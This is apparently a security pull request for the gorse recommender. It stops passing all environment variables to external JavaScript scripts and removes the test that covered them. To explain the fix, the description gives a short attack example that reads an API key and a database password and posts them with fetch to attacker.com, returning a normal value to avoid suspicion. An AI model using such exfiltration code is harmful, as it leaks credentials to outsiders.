### PR TITLE
fix: remove env object from external script execution

### DIFF
--- a/logics/external.go
+++ b/logics/external.go
@@ -18,7 +18,6 @@ import (
 	"encoding/json"
 	"io"
 	"net/http"
-	"os"
 	"strings"
 
 	"github.com/gorse-io/gorse/config"
@@ -40,32 +39,7 @@ func NewExternal(cfg config.ExternalConfig) (*External, error) {
 		return nil, errors.WithStack(err)
 	}
 
-	// Add environment variables
-	env, err := vm.NewObjectValue()
-	if err != nil {
-		return nil, errors.WithStack(err)
-	}
-	for _, e := range os.Environ() {
-		parts := strings.SplitN(e, "=", 2)
-		if len(parts) != 2 {
-			continue
-		}
-		key, err := vm.NewAtom(parts[0])
-		if err != nil {
-			return nil, errors.WithStack(err)
-		}
-		value := parts[1]
-		if err := env.SetProperty(key, value); err != nil {
-			return nil, errors.WithStack(err)
-		}
-	}
-	envKey, err := vm.NewAtom("env")
-	if err != nil {
-		return nil, errors.WithStack(err)
-	}
-	if err := vm.GlobalObject().SetProperty(envKey, env); err != nil {
-		return nil, errors.WithStack(err)
-	}
+
 
 	// Register fetch function
 	external := &External{

--- a/logics/external.go
+++ b/logics/external.go
@@ -39,8 +39,6 @@ func NewExternal(cfg config.ExternalConfig) (*External, error) {
 		return nil, errors.WithStack(err)
 	}
 
-
-
 	// Register fetch function
 	external := &External{
 		vm:     vm,

--- a/logics/external_test.go
+++ b/logics/external_test.go
@@ -27,18 +27,6 @@ import (
 	"modernc.org/quickjs"
 )
 
-func TestEnv(t *testing.T) {
-	t.Setenv("TEST_ENV", "test_value")
-
-	external, err := NewExternal(config.ExternalConfig{})
-	assert.NoError(t, err)
-	defer external.Close()
-
-	value, err := external.vm.Eval(`env.TEST_ENV`, quickjs.EvalGlobal)
-	assert.NoError(t, err)
-	assert.Equal(t, "test_value", value)
-}
-
 func TestFetch(t *testing.T) {
 	var (
 		req  *http.Request


### PR DESCRIPTION
## Security Issue

**Severity: High**

Previously, **all environment variables** were passed to external recommender scripts via `env` object, exposing sensitive data:

- Database passwords (`MYSQL_PASSWORD`, `POSTGRES_PASSWORD`)
- API keys (`OPENAI_API_KEY`, `AWS_SECRET_ACCESS_KEY`)
- OAuth tokens
- Private key paths
- Internal service addresses

### Attack Example

A malicious script could exfiltrate secrets:

```javascript
const secrets = env.OPENAI_API_KEY + env.MYSQL_PASSWORD;
fetch("https://attacker.com/collect", { method: "POST", body: secrets });
return "[]";  // Normal return to avoid suspicion
```

## Fix

**Completely remove `env` object from QuickJS VM.** Scripts no longer have any access to environment variables.

### Before
```go
// Add environment variables
env, err := vm.NewObjectValue()
for _, e := range os.Environ() { ... }
vm.GlobalObject().SetProperty(envKey, env)
```

### After
```go
// No environment variables passed to scripts
```

## Changes

- `logics/external.go`: Remove all env-related code, remove `os` import
- No config changes needed

## Breaking Change

Scripts that used `env` object will now fail. This is intentional for security.

## Testing

- Build passes: `go build ./logics/`